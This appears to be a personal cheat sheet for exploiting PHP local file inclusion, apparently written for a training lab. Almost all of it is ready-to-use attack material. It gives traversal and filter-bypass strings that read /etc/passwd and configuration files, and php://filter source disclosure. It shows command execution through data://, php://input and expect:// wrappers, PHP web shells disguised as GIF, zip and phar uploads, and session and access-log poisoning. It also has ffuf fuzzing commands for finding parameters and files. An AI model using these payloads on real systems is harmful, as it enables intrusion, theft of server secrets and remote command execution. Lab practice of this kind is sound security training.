Local File Inclusion (LFI)
http://10.129.42.65/shell.php?cmd=id
OR
http://10.129.42.65/shell.php&cmd=id
/index.php?language=../../../../etc/passwd
/index.php?language=../../../usr/share/flags/flag.txt
/index.php?language=/../../../etc/passwd
/index.php?language=....//....//....//....//etc/passwd
# URL-encoded form of /index.php?language=../../../../etc/passwd
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
/index.php?language=./languages/../../../../etc/passwd
# Emits the base path followed by 2048 "./" segments (the URL form is shown below)
printf '%s' 'non_existing_directory/../../../etc/passwd/'; printf './%.0s' {1..2048}
non_existing_directory/../../../etc/passwd/./././<SNIP>././././
/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]
# Null Bytes
# PHP version 5.5 or older
# The null byte truncates the path, so the .php appended after passwd is ignored
# e.g. /etc/passwd.php becomes /etc/passwd
/etc/passwd%00
/etc/passwd%00.php
/index.php?language=../../../../etc/passwd%00
# First we need to find some page that we can access
ffuf -w /opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://<SERVER_IP>:<PORT>/FUZZ.php
# Then just access it from the web
/index.php?language=config
# Convert it to base64 first so the source is returned instead of executed
/index.php?language=php://filter/read=convert.base64-encode/resource=config
# This uses the data:// wrapper
# It will execute <?php system($_GET["cmd"]); ?>
echo '<?php system($_GET["cmd"]); ?>' | base64
# Then the base64 payload is URL-encoded and &cmd=id is appended
# PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==&cmd=id
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
# We could also use curl and grep to extract only the output we need
curl -s 'http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid
# The PHP configuration file for Apache is at /etc/php/X.Y/apache2/php.ini
# For Nginx (PHP-FPM) it is at /etc/php/X.Y/fpm/php.ini
# Where X.Y is the installed PHP version
/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini
# Then check the allow_url_include setting
# If it is On, wrappers such as data:// and php://input can be included
echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep allow_url_include
# We could also use php://input so that commands can be executed from the POST data
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
# We could also decode the base64 php.ini and grep for expect
echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep expect
# Then we could just use the expect:// wrapper to execute some commands
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
# Prepend GIF8 so the file's magic bytes look like a GIF
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
# First find the directory where the images are saved
# It is visible in the page source
<img src="/profile_images/shell.gif" class="profile-image" id="profile-image">
/index.php?language=./profile_images/shell.gif&cmd=id
# First we need to create a payload and zip it as shell.jpg
# After that we need to upload shell.jpg
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
# Just access it using the zip:// PHP wrapper
# It reads shell.php from inside shell.jpg and executes id via cmd
/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id
<?php
// Writes shell.phar containing a single entry, shell.txt, behind a minimal stub.
$archive = new Phar('shell.phar');
$archive->startBuffering();
$archive['shell.txt'] = '<?php system($_GET["cmd"]); ?>';
$archive->setStub('<?php __HALT_COMPILER(); ?>');
$archive->stopBuffering();
-------------------------------------------------------------------------------------
# Run the phar script above to create the payload and save it as shell.jpg
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
-------------------------------------------------------------------------------------
# Then include shell.jpg using the phar:// wrapper
/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
# First get the session ID from the cookies in the browser's developer tools
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
# Then we can try to poison it and see whether the server saves the value
/index.php?language=session_poisoning
# Then view the session file again
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
# Now let's try to write the PHP web shell into the session, URL-encoded
/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
# Then navigate to the session file again
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
# Apache logs are located in /var/log/apache2/ on Linux
# Apache logs are located in C:\xampp\apache\logs\ on Windows
# Nginx logs are located in /var/log/nginx/ on Linux
# Nginx logs are located in C:\nginx\log\ on Windows
# Access the logs
/index.php?language=/var/log/apache2/access.log
# Intercept the request to access.log using Burp
# Change the User-Agent to Apache Log Poisoning
# Then just see if it works
# Then we will send another one with the PHP web shell
# OR
# Use curl to send a request with the PHP web shell as the User-Agent
# These are the two ways to get the PHP web shell into the log
curl -s "http://<SERVER_IP>:<PORT>/index.php" -A "<?php system($_GET['cmd']); ?>"
# After that just add &cmd=id to the access.log include URL
# Then we can now execute some commands
# We can use ffuf to find some parameter names
# Like the parameter "language="
ffuf -w /usr/share/wordlists/seclists/SecLists-master/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
# We can use ffuf to find working LFI/RFI payloads
ffuf -w /usr/share/wordlists/seclists/SecLists-master/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287
# We can use ffuf to find the web root folder/directory
# Just replace index.php with the current web page's filename
ffuf -w /usr/share/wordlists/seclists/SecLists-master/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287
# DON'T request /FUZZ/index.php directly: it will keep including index.php and can DoS the server
# We can use ffuf to find configuration files on the web server
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287
# After that we can use curl to read the configuration file
curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/apache2.conf
# We can also see the global variables in the envvars configuration file
curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/envvars